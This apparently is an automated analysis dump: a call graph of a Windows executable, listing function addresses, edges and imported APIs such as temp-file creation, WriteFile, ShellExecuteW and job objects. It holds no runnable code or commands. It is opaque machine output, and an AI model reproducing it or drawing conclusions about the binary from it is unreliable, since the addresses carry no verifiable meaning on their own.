11461->11460 11463 4083ea 4 API calls 11462->11463 11464 4052fa 11463->11464 11465 40247d 19 API calls 11464->11465 11466 405308 11465->11466 11467 402a67 2 API calls 11466->11467 11469 405312 11467->11469 11468 405348 wsprintfW 11470 402ab8 2 API calls 11468->11470 11469->11468 11472 402ab8 ??2@YAPAXI ??3@YAXPAX 11469->11472 11471 40537c 11470->11471 11473 402ab8 2 API calls 11471->11473 11472->11469 11474 405389 11473->11474 11475 40844b 22 API calls 11474->11475 11476 40539e ??3@YAXPAX 11475->11476 12621 4081be ??3@YAXPAX 11476->12621 11478 4053af 11478->11028 11480 4127e6 ctype 2 API calls 11479->11480 11481 4047ef 11480->11481 11482 412709 ctype 2 API calls 11481->11482 11483 41286e ??3@YAXPAX 11482->11483 11483->10830 11485 4056ff 11484->11485 11491 40571b 11484->11491 11488 405711 _wtol 11485->11488 11485->11491 11486 4053b2 9 API calls 11487 40573e 11486->11487 11489 405746 GetLastError 11487->11489 11490 40574c 11487->11490 11488->11491 11489->11490 11490->11028 11491->11486 11493 412468 2 API calls 11492->11493 11494 4059c8 11493->11494 11495 405a24 11494->11495 11497 402a67 2 API calls 11494->11497 11496 402b19 2 API calls 11495->11496 11498 405a2c 11496->11498 11500 4059d7 11497->11500 11499 402baf 2 API calls 11498->11499 11501 405a39 11499->11501 11502 405a95 ??3@YAXPAX 11500->11502 11504 4039e7 88 API calls 11500->11504 11503 402c49 2 API calls 11501->11503 11517 405a91 11502->11517 11505 405a46 11503->11505 11506 4059fb 11504->11506 11507 402c49 2 API calls 11505->11507 11506->11502 11510 412468 2 API calls 11506->11510 11508 405a53 11507->11508 11509 402c49 2 API calls 11508->11509 11511 405a60 11509->11511 11512 405a17 11510->11512 11513 412ace 2 API calls 11511->11513 11512->11502 11514 405a1b ??3@YAXPAX 11512->11514 11515 405a74 11513->11515 11514->11495 11515->11502 11516 405a7d ??3@YAXPAX 11515->11516 11516->11517 11517->10900 11518 4036f6 11519 402b19 2 API calls 11518->11519 11544 40370b 11519->11544 11520 4039aa ??3@YAXPAX 11521 4039e1 11520->11521 11521->10886 11521->10890 11522 4014eb ??2@YAPAXI ??3@YAXPAX 11522->11544 11523 402b19 2 API calls 11523->11544 11524 402dce ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 11524->11544 11525 40143c 2 API calls 11526 40377c ??3@YAXPAX ??3@YAXPAX 11525->11526 11527 4039b6 11526->11527 11526->11544 12627 403026 11527->12627 11531 4039d7 ??3@YAXPAX 11531->11521 11532 403889 strncmp 11534 403874 strncmp 11532->11534 11532->11544 11534->11532 11534->11544 11536 402c21 ??2@YAPAXI ??3@YAXPAX 11536->11544 11537 40143c 2 API calls 11539 4038f6 ??3@YAXPAX 11537->11539 11538 402c21 2 API calls 11538->11534 11540 4030cc 9 API calls 11539->11540 11541 403907 lstrcmpW 11540->11541 11541->11544 11542 40393e lstrlenW wcsncmp 11542->11544 11543 402910 lstrcmpW 11543->11544 11544->11520 11544->11522 11544->11523 11544->11524 11544->11525 11544->11527 11544->11532 11544->11536 11544->11537 11544->11538 11544->11542 11544->11543 11545 4035cf 7 API calls 11544->11545 11546 401403 2 API calls 11544->11546 12622 402958 11544->12622 12626 402990 ??3@YAXPAX ??3@YAXPAX 11544->12626 11545->11544 11546->11544 11548 402a67 2 API calls 11547->11548 11549 4051a7 11548->11549 11550 402ab8 2 API calls 11549->11550 11555 4051b4 11550->11555 11551 4051d0 11552 402ab8 2 API calls 11551->11552 11554 4051da 11552->11554 11553 401795 2 API calls 11553->11555 11556 4049a9 94 API calls 11554->11556 11555->11551 11555->11553 11557 4051e5 ??3@YAXPAX 11556->11557 11557->10954 11559 4049c0 lstrlenW 11558->11559 11560 4049ec 11558->11560 11561 401f6a CharUpperW 11559->11561 11560->10954 11562 4049d6 11561->11562 11562->11559 11562->11560 11563 4049f3 11562->11563 11564 402a67 2 API calls 11563->11564 11567 4049fc 11564->11567 12646 402e16 11567->12646 11568 4036f6 87 API calls 11569 404a6a 11568->11569 11570 404a74 ??3@YAXPAX ??3@YAXPAX 11569->11570 11571 404a8b ??3@YAXPAX ??3@YAXPAX 11569->11571 11570->11560 11571->11560 11573 401403 2 API calls 11572->11573 11574 401511 ??3@YAXPAX 11573->11574 11574->10954 11576 4027a1 11575->11576 11577 402787 CheckTokenMembership FreeSid 11575->11577 11576->10934 11576->10938 11577->11576 11579 4013d1 2 API calls 11578->11579 11580 404cfb 11579->11580 11581 401795 2 API calls 11580->11581 11582 404d06 11581->11582 11582->11000 11584 4035e9 11583->11584 11585 4035de 11583->11585 11587 416407 4 API calls 11584->11587 12656 402cad 11585->12656 11588 4035f5 11587->11588 11588->10984 11589->11001 11591 4083ea 4 API calls 11590->11591 11592 40449d 11591->11592 11592->10977 11593->10991 11597 409815 11594->11597 11602 409a82 11594->11602 11595 4029a6 lstrcmpW 11595->11597 11596 408c6a 25 API calls 11596->11597 11597->11595 11597->11596 11598 401556 6 API calls 11597->11598 11599 4083ea 4 API calls 11597->11599 11600 408bec 25 API calls 11597->11600 11601 408caa 25 API calls 11597->11601 11597->11602 11603 404495 4 API calls 11597->11603 11605 40247d 19 API calls 11597->11605 11606 409599 27 API calls 11597->11606 11607 409606 57 API calls 11597->11607 11609 404765 4 API calls 11597->11609 11610 40844b 22 API calls 11597->11610 12661 4084c5 11597->12661 12665 4081be ??3@YAXPAX 11597->12665 11598->11597 11599->11597 11600->11597 11601->11597 11602->11008 11603->11597 11605->11597 11606->11597 11607->11597 11609->11597 11610->11597 11612 4029a6 lstrcmpW 11611->11612 11613 40970f 11612->11613 11615 40971d 11613->11615 12666 401ed5 GetStdHandle WriteFile 11613->12666 11618 409730 11615->11618 12667 401ed5 GetStdHandle WriteFile 11615->12667 11617 409745 11619 409756 11617->11619 12669 401ed5 GetStdHandle WriteFile 11617->12669 11618->11617 12668 401ed5 GetStdHandle WriteFile 11618->12668 11622 4029a6 lstrcmpW 11619->11622 11623 409763 11622->11623 11624 409771 11623->11624 12670 401ed5 GetStdHandle WriteFile 11623->12670 11626 4029a6 lstrcmpW 11624->11626 11627 40977e 11626->11627 11628 40978c 11627->11628 12671 401ed5 GetStdHandle WriteFile 11627->12671 11629 4029a6 lstrcmpW 11628->11629 11631 409799 11629->11631 11632 4097a7 11631->11632 12672 401ed5 GetStdHandle WriteFile 11631->12672 11634 4029a6 lstrcmpW 11632->11634 11635 4097b4 11634->11635 11636 4097c2 11635->11636 12673 401ed5 GetStdHandle WriteFile 11635->12673 11638 4029a6 lstrcmpW 11636->11638 11639 4097cf 11638->11639 11640 4097e2 11639->11640 11642 4029a6 lstrcmpW 11639->11642 11643 4097f0 11640->11643 12674 401ed5 GetStdHandle WriteFile 11640->12674 11642->11640 11643->11002 11645 408c0f 11644->11645 11646 408c42 11645->11646 11647 408c24 11645->11647 12678 4085f7 11646->12678 12675 4085de 11647->12675 11652 40844b 22 API calls 11654 408c3d 11652->11654 11653 40844b 22 API calls 11653->11654 12681 4081be ??3@YAXPAX 11654->12681 11656 408c65 11656->11050 11658 408c7f 11657->11658 11659 4010bd 4 API calls 11658->11659 11660 408c8a 11659->11660 11661 40844b 22 API calls 11660->11661 11662 408c9b 11661->11662 12682 4081be ??3@YAXPAX 11662->12682 11664 408ca5 11664->11050 11666 4014eb 2 API calls 11665->11666 11667 4048b4 11666->11667 11668 402aa0 2 API calls 11667->11668 11669 4048bd GetTempPathW 11668->11669 11670 4048d6 11669->11670 11675 4048ed 11669->11675 11671 402aa0 2 API calls 11670->11671 11672 4048e1 GetTempPathW 11671->11672 11672->11675 11673 402aa0 2 API calls 11674 404910 wsprintfW 11673->11674 11674->11675 11675->11673 11676 404927 GetFileAttributesW 11675->11676 11677 40494b 11675->11677 11676->11675 11676->11677 11677->11035 11679 408cbd 11678->11679 12683 40862c 11679->12683 11682 40844b 22 API calls 11683 408cf2 11682->11683 12686 4081be ??3@YAXPAX 11683->12686 11685 408cfc 11685->11053 11687 404787 11686->11687 11689 404792 ??3@YAXPAX ??3@YAXPAX 11686->11689 11688 4032e9 16 API calls 11687->11688 11688->11689 11689->11028 11691 4029a6 lstrcmpW 11690->11691 11692 404e68 11691->11692 11693 404e9d 11692->11693 11694 401403 2 API calls 11692->11694 11693->11105 11695 404e77 11694->11695 11696 4044e2 20 API calls 11695->11696 11697 404e7d 11696->11697 11697->11693 11698 401795 2 API calls 11697->11698 11698->11693 11700 4014eb 2 API calls 11699->11700 11701 40549e 11700->11701 11702 4014eb 2 API calls 11701->11702 11703 4054a6 GetCommandLineW 11702->11703 11704 404e9f 2 API calls 11703->11704 11705 4054b6 11704->11705 11706 404cb1 2 API calls 11705->11706 11707 4054e9 11706->11707 11708 404ccf 2 API calls 11707->11708 11709 4054f6 11708->11709 11710 404ccf 2 API calls 11709->11710 11711 405503 11710->11711 11712 404ced 2 API calls 11711->11712 11713 405510 11712->11713 11714 404ced 2 API calls 11713->11714 11715 40551d 11714->11715 11716 404ced 2 API calls 11715->11716 11717 40552a 11716->11717 11718 404ced 2 API calls 11717->11718 11719 405537 11718->11719 11720 404ccf 2 API calls 11719->11720 11721 405544 11720->11721 11722 404ccf 2 API calls 11721->11722 11723 405551 11722->11723 11724 404ccf 2 API calls 11723->11724 11725 40555e 11724->11725 11726 40143c 2 API calls 11725->11726 11727 40556a 12 API calls 11726->11727 11728 405622 CreateJobObjectW 11727->11728 11729 4055ff GetLastError 11727->11729 11731 40563a AssignProcessToJobObject 11728->11731 11732 40569d ResumeThread WaitForSingleObject 11728->11732 11730 405607 ??3@YAXPAX ??3@YAXPAX 11729->11730 11730->11163 11731->11732 11733 405648 CreateIoCompletionPort 11731->11733 11734 4056ad CloseHandle GetExitCodeProcess 11732->11734 11733->11732 11735 40565a SetInformationJobObject ResumeThread 11733->11735 11736 4056d3 CloseHandle 11734->11736 11737 4056ca GetLastError 11734->11737 11740 405688 GetQueuedCompletionStatus 11735->11740 11738 4056dc CloseHandle 11736->11738 11739 4056df 11736->11739 11737->11736 11738->11739 11741 4056e5 CloseHandle 11739->11741 11742 4056ea 11739->11742 11740->11732 11743 405682 11740->11743 11741->11742 11742->11730 11743->11734 11743->11740 11745 4026b4 LoadLibraryA GetProcAddress 11744->11745 11746 4026cf 11744->11746 11745->11746 11746->11150 11748 4014eb 2 API calls 11747->11748 11756 405204 11748->11756 11749 401403 2 API calls 11749->11756 11750 405296 11751 4052d0 ??3@YAXPAX 11750->11751 11753 4051f3 3 API calls 11750->11753 11751->11106 11752 401795 2 API calls 11752->11756 11755 4052cd 11753->11755 11754 4029a6 lstrcmpW 11754->11756 11755->11751 11756->11749 11756->11750 11756->11752 11756->11754 11758 4083ea 4 API calls 11757->11758 11759 40476d 11758->11759 11759->11083 11760->11063 11762 405945 ??3@YAXPAX 11761->11762 11763 4057a9 11761->11763 11765 40594b 11762->11765 11763->11762 11764 4057bd GetDriveTypeW 11763->11764 11764->11762 11766 4057e9 11764->11766 11765->11064 11767 4048a3 6 API calls 11766->11767 11768 4057f7 CreateFileW 11767->11768 11769 40581d 11768->11769 11770 40590f ??3@YAXPAX ??3@YAXPAX 11768->11770 11771 4014eb 2 API calls 11769->11771 11770->11765 11772 405826 11771->11772 11773 401403 2 API calls 11772->11773 11774 405833 11773->11774 11775 402ab8 2 API calls 11774->11775 11776 405841 11775->11776 11777 4014bc 2 API calls 11776->11777 11778 40584d 11777->11778 11779 402ab8 2 API calls 11778->11779 11780 40585b 11779->11780 11781 402ab8 2 API calls 11780->11781 11782 405868 11781->11782 11783 4014bc 2 API calls 11782->11783 11784 405874 11783->11784 11785 402ab8 2 API calls 11784->11785 11786 405881 11785->11786 11787 402ab8 2 API calls 11786->11787 11788 40588a 11787->11788 11789 4014bc 2 API calls 11788->11789 11790 405896 11789->11790 11791 402ab8 2 API calls 11790->11791 11792 40589f 11791->11792 11793 402e16 3 API calls 11792->11793 11794 4058b1 WriteFile ??3@YAXPAX CloseHandle 11793->11794 11795 405920 11794->11795 11796 4058df 11794->11796 11797 4032e9 16 API calls 11795->11797 11796->11795 11798 4058e7 SetFileAttributesW ShellExecuteW ??3@YAXPAX 11796->11798 11799 405928 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11797->11799 11798->11770 11799->11765 11809 402805 11800->11809 11804 4014eb 2 API calls 11803->11804 11805 402dda 11804->11805 11806 402e12 11805->11806 11814 402aa0 11805->11814 11806->11203 11810 402813 ??2@YAPAXI 11809->11810 11811 40283f 11809->11811 11810->11811 11812 402824 ??3@YAXPAX 11810->11812 11811->11203 11812->11811 11815 402ab2 MultiByteToWideChar 11814->11815 11816 402aac 11814->11816 11815->11806 11817 4011b7 2 API calls 11816->11817 11817->11815 11818->11220 11820 402692 11819->11820 11821 402686 GetNativeSystemInfo 11819->11821 11820->11223 11821->11223 11822->11246 11824 401fb8 11823->11824 11826 401f78 11823->11826 11824->11252 11825 4126c0 CharUpperW 11825->11826 11826->11824 11826->11825 11827 401fc5 11826->11827 11831 4126c0 CharUpperW 11827->11831 11829 401fd5 11832 4126c0 CharUpperW 11829->11832 11831->11829 11832->11824 11836 4123a4 11833->11836 11837 41236b 2 API calls 11836->11837 11838 40614b 11837->11838 11838->10869 11838->10870 11889 402baf 11839->11889 11842 402baf 2 API calls 11843 403ebf 11842->11843 11893 402d03 11843->11893 11846 402be9 2 API calls 11847 403edc ??3@YAXPAX 11846->11847 11848 402d03 3 API calls 11847->11848 11849 403ef7 11848->11849 11850 402be9 2 API calls 11849->11850 11851 403f02 ??3@YAXPAX 11850->11851 11852 403f42 11851->11852 11853 403f18 11851->11853 11854 403f48 wsprintfA 11852->11854 11855 403f6f 11852->11855 11853->11852 11856 403f1d wsprintfA 11853->11856 11857 402c49 2 API calls 11854->11857 11858 402c49 2 API calls 11855->11858 11859 402c49 2 API calls 11856->11859 11860 403f64 11857->11860 11861 403f7c 11858->11861 11862 403f37 11859->11862 11864 402c49 2 API calls 11860->11864 11865 402c49 2 API calls 11861->11865 11863 402c49 2 API calls 11862->11863 11863->11852 11864->11855 11866 403f84 11865->11866 11867 402ee4 11866->11867 11868 402ef1 11867->11868 11908 412a6a 11868->11908 11870 402f30 11871 402fb8 memcmp 11870->11871 11872 402fdb memmove 11870->11872 11873 402f7b memcmp 11870->11873 11874 40300e 11870->11874 11914 412a36 11870->11914 11918 402c21 11870->11918 11871->11870 11872->11870 11872->11874 11873->11870 11873->11874 11878 402be9 11874->11878 11879 402bf5 11878->11879 11881 402c06 11878->11881 11880 402805 2 API calls 11879->11880 11880->11881 11881->11282 11883 402851 2 API calls 11882->11883 11884 402c8f 11883->11884 11884->11289 11886 402c58 11885->11886 11886->11886 11887 402851 2 API calls 11886->11887 11888 402c65 11887->11888 11888->11282 11890 402bc5 11889->11890 11890->11890 11891 402805 2 API calls 11890->11891 11892 402bd2 11891->11892 11892->11842 11894 402d1e 11893->11894 11895 402d35 11894->11895 11896 402d2a 11894->11896 11897 402b19 2 API calls 11895->11897 11905 402b61 11896->11905 11899 402d3e 11897->11899 11901 402805 2 API calls 11899->11901 11900 402d33 11900->11846 11902 402d47 11901->11902 11903 402b61 2 API calls 11902->11903 11904 402d75 ??3@YAXPAX 11903->11904 11904->11900 11906 402805 2 API calls 11905->11906 11907 402b7c 11906->11907 11907->11900 11909 412a7a 11908->11909 11910 402f03 lstrlenA lstrlenA 11908->11910 11921 412305 SetFilePointer 11909->11921 11910->11870 11913 4129fa GetLastError 11913->11910 11915 412a4e 11914->11915 11916 4129fa GetLastError 11915->11916 11917 412a65 11916->11917 11917->11870 11924 402851 11918->11924 11922 412338 11921->11922 11923 41232e GetLastError 11921->11923 11922->11913 11923->11922 11925 402895 11924->11925 11926 402865 11924->11926 11925->11870 11927 402805 2 API calls 11926->11927 11927->11925 11932 401ff0 11928->11932 11935 412260 11928->11935 11929 40624e 11929->10886 11929->11518 11933 401ff7 VirtualFree 11932->11933 11934 402008 11932->11934 11933->11934 11934->11929 11936 412280 11935->11936 11937 41226e 11935->11937 11936->11929 11940 411e20 11937->11940 11941 401ff0 VirtualFree 11940->11941 11942 411e39 11941->11942 11943 401ff0 VirtualFree 11942->11943 11944 411e65 ??3@YAXPAX 11943->11944 11944->11936 11946 4046ae 11945->11946 11957 4045d4 11946->11957 11950 404644 11949->11950 11951 4045d4 _wtol 11950->11951 11952 404665 11951->11952 11952->11330 11954 404675 11953->11954 11955 4045d4 _wtol 11954->11955 11956 40468d 11955->11956 11956->11336 11960 4045de 11957->11960 11958 4045f9 _wtol 11958->11960 11959 404632 11959->11324 11960->11958 11960->11959 11962 4014eb 2 API calls 11961->11962 11963 404c90 11962->11963 11964 401795 2 API calls 11963->11964 11965 404c99 11964->11965 11966 401795 2 API calls 11965->11966 11967 404ca2 11966->11967 11968 401795 2 API calls 11967->11968 11969 404cab 11968->11969 11970 40484d 11969->11970 11971 40489d ??3@YAXPAX 11970->11971 11972 40485e 11970->11972 11971->10927 11972->11971 11974 402cce 11972->11974 11975 402ce4 11974->11975 11976 402cf8 11975->11976 11978 40289b memmove 11975->11978 11976->11971 11978->11976 11980 404820 11979->11980 11981 402cce memmove 11980->11981 11982 404847 ??3@YAXPAX 11981->11982 11982->10929 11985 40291b 11983->11985 11984 402927 lstrcmpW 11984->11985 11986 402944 11984->11986 11985->11984 11985->11986 11986->10984 12000 401397 11987->12000 12003 4169ec 11987->12003 12011 415eea _EH_prolog 11987->12011 11988 40115f 11988->11396 12580 401519 11992->12580 11995 401503 2 API calls 11996 40158d ??3@YAXPAX 11995->11996 12585 4081be ??3@YAXPAX 11996->12585 11999 4015a2 11999->11402 12001 4013a3 ??3@YAXPAX 12000->12001 12002 4013ac 12000->12002 12001->12002 12002->11988 12004 4169fe 12003->12004 12009 412a6a 3 API calls 12004->12009 12005 416a12 12006 416a49 12005->12006 12010 412a6a 3 API calls 12005->12010 12006->11988 12007 416a26 12007->12006 12030 416891 12007->12030 12009->12005 12010->12007 12012 415f0b 12011->12012 12013 4169ec 13 API calls 12012->12013 12014 415f49 12013->12014 12015 415f75 12014->12015 12016 415f4f 12014->12016 12017 4014eb 2 API calls 12015->12017 12069 415b0a 12016->12069 12019 415f86 12017->12019 12066 418390 _EH_prolog 12019->12066 12043 413b40 12030->12043 12032 4168bd 12032->12006 12033 4168a9 12033->12032 12046 40b2b0 12033->12046 12036 41698a ??3@YAXPAX 12036->12032 12038 416973 memmove 12039 4168f6 12038->12039 12039->12036 12039->12038 12040 41699f memcpy 12039->12040 12041 416995 ??3@YAXPAX 12039->12041 12042 412a6a 3 API calls 12040->12042 12041->12032 12042->12041 12054 413af5 12043->12054 12047 40b300 memcpy 12046->12047 12048 40b2bd 12046->12048 12047->12039 12049 40b2c2 ??2@YAPAXI 12048->12049 12050 40b2eb 12048->12050 12051 40b2d4 memmove 12049->12051 12052 40b2ed ??3@YAXPAX 12049->12052 12050->12052 12051->12052 12052->12047 12055 413b39 12054->12055 12056 413b07 12054->12056 12055->12033 12056->12055 12058 412a36 GetLastError 12056->12058 12059 413465 12056->12059 12058->12056 12060 41348a 12059->12060 12061 4134a6 12060->12061 12063 413512 12060->12063 12061->12056 12064 4134c7 SetFilePointer GetLastError GetLastError EnterCriticalSection LeaveCriticalSection 12063->12064 12065 413536 12064->12065 12065->12061 12077 4180ff 12066->12077 12563 41599a 12069->12563 12099 4157f1 12077->12099 12222 415762 12099->12222 12223 4127e6 ctype 2 API calls 12222->12223 12224 41576b 12223->12224 12225 4127e6 ctype 2 API calls 12224->12225 12226 415773 12225->12226 12227 4127e6 ctype 2 API calls 12226->12227 12228 41577b 12227->12228 12229 4127e6 ctype 2 API calls 12228->12229 12230 415783 12229->12230 12231 4127e6 ctype 2 API calls 12230->12231 12232 41578b 12231->12232 12233 4127e6 ctype 2 API calls 12232->12233 12234 415793 12233->12234 12235 4127e6 ctype 2 API calls 12234->12235 12236 41579d 12235->12236 12237 4127e6 ctype 2 API calls 12236->12237 12238 4157a5 12237->12238 12239 4127e6 ctype 2 API calls 12238->12239 12240 4157b2 12239->12240 12241 4127e6 ctype 2 API calls 12240->12241 12242 4157ba 12241->12242 12243 4127e6 ctype 2 API calls 12242->12243 12244 4157c7 12243->12244 12245 4127e6 ctype 2 API calls 12244->12245 12246 4157cf 12245->12246 12247 4127e6 ctype 2 API calls 12246->12247 12248 4157dc 12247->12248 12249 4127e6 ctype 2 API calls 12248->12249 12250 4157e4 12249->12250 12564 4127e6 ctype 2 API calls 12563->12564 12565 4159a8 12564->12565 12586 4010bd 12580->12586 12583 4014eb 2 API calls 12584 40152f 12583->12584 12584->11995 12585->11999 12587 4083ea 4 API calls 12586->12587 12588 4010c5 12587->12588 12588->12583 12590 401893 12589->12590 12591 401403 2 API calls 12590->12591 12592 4018a0 12591->12592 12593 401795 2 API calls 12592->12593 12594 4018a9 CreateThread 12593->12594 12595 4018d8 12594->12595 12596 4018dd WaitForSingleObject 12594->12596 12613 40133c 12594->12613 12599 408caa 25 API calls 12595->12599 12597 4018fa 12596->12597 12598 40192c 12596->12598 12600 401918 12597->12600 12604 401909 12597->12604 12601 401928 12598->12601 12602 401934 GetExitCodeThread 12598->12602 12599->12596 12605 409606 57 API calls 12600->12605 12601->11423 12603 40194b 12602->12603 12603->12601 12603->12604 12606 40197a SetLastError 12603->12606 12604->12601 12607 409606 57 API calls 12604->12607 12605->12601 12606->12604 12607->12601 12609 4014eb 2 API calls 12608->12609 12610 4016fb 12609->12610 12611 4014eb 2 API calls 12610->12611 12612 401707 12611->12612 12612->11417 12614 401345 12613->12614 12615 401358 12613->12615 12614->12615 12616 401347 Sleep 12614->12616 12617 401391 12615->12617 12618 401383 EndDialog 12615->12618 12616->12614 12618->12617 12620 402701 12619->12620 12620->11427 12621->11478 12623 402965 lstrcmpW 12622->12623 12624 40298d 12622->12624 12625 40297c 12623->12625 12624->11544 12625->12623 12625->12624 12626->11544 12628 403041 12627->12628 12629 403035 12627->12629 12631 402b19 2 API calls 12628->12631 12645 401ed5 GetStdHandle WriteFile 12629->12645 12634 40304b 12631->12634 12632 40303c 12644 402990 ??3@YAXPAX ??3@YAXPAX 12632->12644 12633 403076 12635 402dce 3 API calls 12633->12635 12634->12633 12637 402c21 2 API calls 12634->12637 12636 403088 12635->12636 12638 403096 12636->12638 12639 4030aa 12636->12639 12637->12634 12640 409606 57 API calls 12638->12640 12641 409606 57 API calls 12639->12641 12642 4030a5 ??3@YAXPAX ??3@YAXPAX 12640->12642 12641->12642 12642->12632 12644->11531 12645->12632 12647 402b19 2 API calls 12646->12647 12649 402e25 12647->12649 12648 402e61 12648->11568 12649->12648 12652 402b97 12649->12652 12653 402ba3 12652->12653 12654 402ba9 WideCharToMultiByte 12652->12654 12655 402805 2 API calls 12653->12655 12654->12648 12655->12654 12657 4013d1 2 API calls 12656->12657 12658 402cbb 12657->12658 12659 4013d1 2 API calls 12658->12659 12660 402cc7 12659->12660 12660->11584 12662 4084d0 12661->12662 12663 4084d5 12661->12663 12662->11597 12663->12662 12664 40844b 22 API calls 12663->12664 12664->12662 12665->11597 12666->11615 12667->11618 12668->11617 12669->11619 12670->11624 12671->11628 12672->11632 12673->11636 12674->11643 12676 4083ea 4 API calls 12675->12676 12677 4085e6 12676->12677 12677->11652 12679 4010bd 4 API calls 12678->12679 12680 4085ff 12679->12680 12680->11653 12681->11656 12682->11664 12684 4083ea 4 API calls 12683->12684 12685 408634 12684->12685 12685->11682 12686->11685 13180 418c06 13189 414368 13180->13189 13183 4127e6 ctype 2 API calls 13188 418c26 13183->13188 13184 418c6a 13188->13184 13198 4184f5 ??2@YAPAXI 13188->13198 13202 4142fb 13188->13202 13209 413851 13188->13209 13216 413ef7 13189->13216 13192 413ef7 6 API calls 13193 414382 13192->13193 13221 418adb 13193->13221 13196 418adb 6 API calls 13197 41439a 13196->13197 13197->13183 13199 418504 13198->13199 13200 416407 4 API calls 13199->13200 13201 41851f 13200->13201 13201->13188 13236 407531 13202->13236 13205 407531 2 API calls 13206 414310 13205->13206 13207 407531 2 API calls 13206->13207 13208 414316 13207->13208 13208->13188 13240 4075df 13209->13240 13212 41387c 13212->13188 13213 4075df 2 API calls 13214 41386c 13213->13214 13214->13212 13215 4075df 2 API calls 13214->13215 13215->13212 13217 4127e6 ctype 2 API calls 13216->13217 13218 413eff 13217->13218 13226 413cd1 13218->13226 13222 4127e6 ctype 2 API calls 13221->13222 13223 418ae3 13222->13223 13231 41854a 13223->13231 13227 41271d 4 API calls 13226->13227 13228 413ce9 13227->13228 13229 413d05 13228->13229 13230 4163dd 4 API calls 13228->13230 13229->13192 13230->13228 13232 41271d 4 API calls 13231->13232 13233 418562 13232->13233 13234 41438e 13233->13234 13235 416407 4 API calls 13233->13235 13234->13196 13235->13233 13237 40753c CloseHandle 13236->13237 13239 407551 13236->13239 13238 407547 GetLastError 13237->13238 13237->13239 13238->13239 13239->13205 13243 407591 CreateEventW 13240->13243 13246 40751b 13243->13246 13245 4075b5 13245->13212 13245->13213 13247 407522 13246->13247 13248 407525 GetLastError 13246->13248 13247->13245 13249 40752f 13248->13249 13249->13245 14045 412f0c 14049 412f19 14045->14049 14046 412f40 memcpy 14046->14049 14048 412fb2 14049->14046 14049->14048 14050 412b55 14049->14050 14052 412b5f 14050->14052 14051 413b69 110 API calls 14053 412b8e 14051->14053 14052->14051 14053->14049 14075 405b1f 14076 402a67 2 API calls 14075->14076 14077 405b33 14076->14077 14078 4041b2 7 API calls 14077->14078 14079 405b41 14078->14079 14097 40426d 14079->14097 14081 405b50 14120 404328 14081->14120 14083 405b5f 14143 4043e3 14083->14143 14085 405be5 14162 403b54 14085->14162 14089 402e67 6 API calls 14091 405b68 14089->14091 14090 4041b2 7 API calls 14090->14091 14091->14085 14091->14089 14091->14090 14092 40426d 7 API calls 14091->14092 14093 404328 7 API calls 14091->14093 14094 4043e3 4 API calls 14091->14094 14148 403573 GetEnvironmentVariableW 14091->14148 14156 405aaf 14091->14156 14092->14091 14093->14091 14094->14091 14098 4014eb 2 API calls 14097->14098 14099 40427b 14098->14099 14100 40143c 2 API calls 14099->14100 14101 404286 14100->14101 14102 402ab8 2 API calls 14101->14102 14103 404293 14102->14103 14104 402a67 2 API calls 14103->14104 14105 4042a0 14104->14105 14106 404137 3 API calls 14105->14106 14107 4042b0 ??3@YAXPAX 14106->14107 14108 40143c 2 API calls 14107->14108 14109 4042c4 14108->14109 14110 402ab8 2 API calls 14109->14110 14111 4042d1 14110->14111 14112 402a67 2 API calls 14111->14112 14113 4042de 14112->14113 14114 404137 3 API calls 14113->14114 14115 4042ee ??3@YAXPAX 14114->14115 14116 402a67 2 API calls 14115->14116 14117 404305 14116->14117 14118 404137 3 API calls 14117->14118 14119 404314 ??3@YAXPAX ??3@YAXPAX 14118->14119 14119->14081 14121 4014eb 2 API calls 14120->14121 14122 404336 14121->14122 14123 40143c 2 API calls 14122->14123 14124 404341 14123->14124 14125 402ab8 2 API calls 14124->14125 14126 40434e 14125->14126 14127 402a67 2 API calls 14126->14127 14128 40435b 14127->14128 14129 404137 3 API calls 14128->14129 14130 40436b ??3@YAXPAX 14129->14130 14131 40143c 2 API calls 14130->14131 14132 40437f 14131->14132 14133 402ab8 2 API calls 14132->14133 14134 40438c 14133->14134 14135 402a67 2 API calls 14134->14135 14136 404399 14135->14136 14137 404137 3 API calls 14136->14137 14138 4043a9 ??3@YAXPAX 14137->14138 14139 402a67 2 API calls 14138->14139 14140 4043c0 14139->14140 14141 404137 3 API calls 14140->14141 14142 4043cf ??3@YAXPAX ??3@YAXPAX 14141->14142 14142->14083 14144 402a67 2 API calls 14143->14144 14145 4043f6 14144->14145 14146 404137 3 API calls 14145->14146 14147 404407 ??3@YAXPAX 14146->14147 14147->14091 14149 4014eb 2 API calls 14148->14149 14150 403597 14149->14150 14151 402aa0 2 API calls 14150->14151 14152 4035a5 14151->14152 14153 402aa0 2 API calls 14152->14153 14154 4035b1 GetEnvironmentVariableW 14153->14154 14155 4035bf 14154->14155 14155->14091 14157 405b1a ??3@YAXPAX 14156->14157 14160 405ac5 14156->14160 14157->14085 14157->14091 14158 401f6a CharUpperW 14158->14160 14159 402cce memmove 14159->14160 14160->14157 14160->14158 14160->14159 14161 4035f9 3 API calls 14160->14161 14161->14160 14163 403b71 14162->14163 14165 403b7d 14162->14165 14164 403b77 _wtol 14163->14164 14163->14165 14164->14165 14166 403c11 SHGetSpecialFolderPathW 14165->14166 14167 403e91 ??3@YAXPAX 14165->14167 14166->14167 14168 403c29 14166->14168 14169 402a67 2 API calls 14168->14169 14170 403c38 14169->14170 14171 4014eb 2 API calls 14170->14171 14172 403c40 14171->14172 14173 4014eb 2 API calls 14172->14173 14174 403c48 14173->14174 14175 4014eb 2 API calls 14174->14175 14176 403c50 14175->14176 14177 4014eb 2 API calls 14176->14177 14178 403c58 14177->14178 14179 4014eb 2 API calls 14178->14179 14180 403c60 14179->14180 14181 4014eb 2 API calls 14180->14181 14182 403c68 14181->14182 14183 4014eb 2 API calls 14182->14183 14184 403c70 14183->14184 14185 4014eb 2 API calls 14184->14185 14186 403c78 14185->14186 14223 403333 14186->14223 14189 403cc9 14192 403333 2 API calls 14189->14192 14190 403c89 7 API calls 14191 403e81 ??3@YAXPAX ??3@YAXPAX 14190->14191 14191->14167 14193 403cd3 14192->14193 14194 403333 2 API calls 14193->14194 14195 403cdd 14194->14195 14196 403333 2 API calls 14195->14196 14197 403ce7 14196->14197 14198 403333 2 API calls 14197->14198 14199 403cf1 14198->14199 14200 403333 2 API calls 14199->14200 14201 403cfb 14200->14201 14202 403333 2 API calls 14201->14202 14203 403d05 14202->14203 14204 403333 2 API calls 14203->14204 14205 403d0f _wtol 14204->14205 14206 403d21 14205->14206 14213 403d38 14205->14213 14210 401403 2 API calls 14206->14210 14207 401795 2 API calls 